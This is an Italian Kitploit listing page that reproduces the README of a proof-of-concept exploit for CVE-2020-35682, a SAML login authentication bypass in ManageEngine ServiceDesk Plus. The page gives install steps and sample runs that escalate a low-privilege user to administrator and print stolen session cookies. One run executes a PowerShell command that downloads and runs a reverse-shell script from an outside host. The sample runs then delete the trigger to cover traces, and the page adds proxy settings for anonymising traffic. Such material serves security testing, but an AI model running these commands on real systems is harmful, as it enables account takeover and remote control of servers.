Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-35682 — Exploit proof-of-concept per CVE-2020-35682: bypass dell'autenticazione SAML in ManageEngine ServiceDesk Plus, che consente l'escalation dei privilegi ad amministratore e l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/its-arun/cve-2020-35682
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneStrumento di Accesso Remoto
GitHubits-arun/cve-2020-35682

CVE-2020-35682

Exploit proof-of-concept per CVE-2020-35682: bypass dell'autenticazione SAML in ManageEngine ServiceDesk Plus, che consente l'escalation dei privilegi ad amministratore e l'esecuzione remota di codice.

Vedi Repository
85145 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-35682

SD-91948: CVE-2020-35682: Vulnerabilità di bypass dell'autenticazione durante il login SAML in ServiceDesk Plus. (Come descritto da ManageEngine). Se l'installazione di ServiceDesk Plus (<11134) presa di mira ha il login SAML abilitato e disponi delle credenziali di un utente con privilegi bassi, puoi elevare i privilegi ad amministratore e ottenere RCE.

Ho deciso di rilasciare questo POC poiché non esiste né un exploit pubblico né una descrizione dettagliata per sfruttare questo bug. Il codice è piuttosto disordinato ma funziona.

Installazione

root@kitploit:~
git clone https://github.com/its-arun/CVE-2020-35682.git
cd CVE-2020-35682
pip3 install -r requirements.txt
chmod +x exploit.py

Utilizzo

root@kitploit:~
┌─[✗]─[felli0t@damnlab]─[~/POCs/CVE-2020-35682]
└──╼ $./exploit.py -h
usage: exploit.py [-h] -u URL -e EMAIL -p PASSWORD -d DOMAIN [-x PAYLOAD] [-a ADMINUSERNAME]

CVE-2020-35682 : Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus

optional arguments:
  -h, --help            show this help message and exit
  -x PAYLOAD, --payload PAYLOAD
                        Payload to execute on target, eg: "powershell iex(iwr http://192.168.2.10:8080/reverseshell.ps1
                        -usebasicparsing)"
  -a ADMINUSERNAME, --adminusername ADMINUSERNAME
                        Admin Username, default: administrator

required named arguments:
  -u URL, --url URL     ServiceDesk Plus installation url, eg. https://tenet.local/sdp
  -e EMAIL, --email EMAIL
                        User E-mail for SAML Login, eg: [email protected]
  -p PASSWORD, --password PASSWORD
                        User Password for SAML Login
  -d DOMAIN, --domain DOMAIN
                        Domain, eg: TENET

Ottieni il cookie di amministratore

root@kitploit:~
┌─[felli0t@damnlab]─[~/POCs/CVE-2020-35682]
└──╼ $./exploit.py -u "https://tenet.local/sdp" -e '[email protected]' -p 'P@ssw0rd' -d "TENET"
[+] Created session as administrator.
[+] Use following cookies to login as administrator
	=[COOKIE NAME]=                =[COOKIE VALUE]=              
	JSESSIONIDSSO                  E1D80C738E12085360A789109D43A233
	PORTALID                       1                             
	SDPSESSIONID                   918B7C63186055F72EAD2DEAC34B4CA9

Esegui comando sul target

root@kitploit:~
┌─[felli0t@damnlab]─[~/POCs/CVE-2020-35682]
└──╼ $./exploit.py -u "https://tenet.local/sdp" -e '[email protected]' -p 'P@ssw0rd' -d "TENET" -x "powershell iex(iwr http://192.168.2.10:8080/reverseshell.ps1 -usebasicparsing)"
[+] Created session as administrator.
[+] Use following cookies to login as administrator
	=[COOKIE NAME]=                =[COOKIE VALUE]=              
	JSESSIONIDSSO                  2316433DF39DFFE8ACD4E1DDD759D259
	PORTALID                       1                             
	SDPSESSIONID                   666788540DB6329CB7E59E1E96FF30EB
[+] Created custom trigger ADQRYN11WA6KEXIQ
[+] Created Request to trigger custom action ADQRYN11WA6KEXIQ
[+] Executed "powershell iex(iwr http://192.168.2.10:8080/reverseshell.ps1 -usebasicparsing)" on "https://tenet.local/sdp"
[+] Deleted Request ADQRYN11WA6KEXIQ
[+] Deleted Custom Action ADQRYN11WA6KEXIQ

Utilizzo con proxy

I proxy possono essere definiti alla riga 9 in exploit.py nel formato seguente

root@kitploit:~
proxies = {'http': 'socks4://127.0.0.1:9050','https': 'socks4://127.0.0.1:9050'}

Oppure puoi impostare il proxy come variabile d'ambiente se non desideri modificare il sorgente

root@kitploit:~
export HTTP_PROXY="socks4://127.0.0.1:9050"
export HTTPS_PROXY="socks4://127.0.0.1:9050"

Assicurati di annullare l'impostazione di queste variabili dopo aver eseguito l'exploit.

root@kitploit:~
unset HTTP_PROXY HTTPS_PROXY
Scarica lo strumento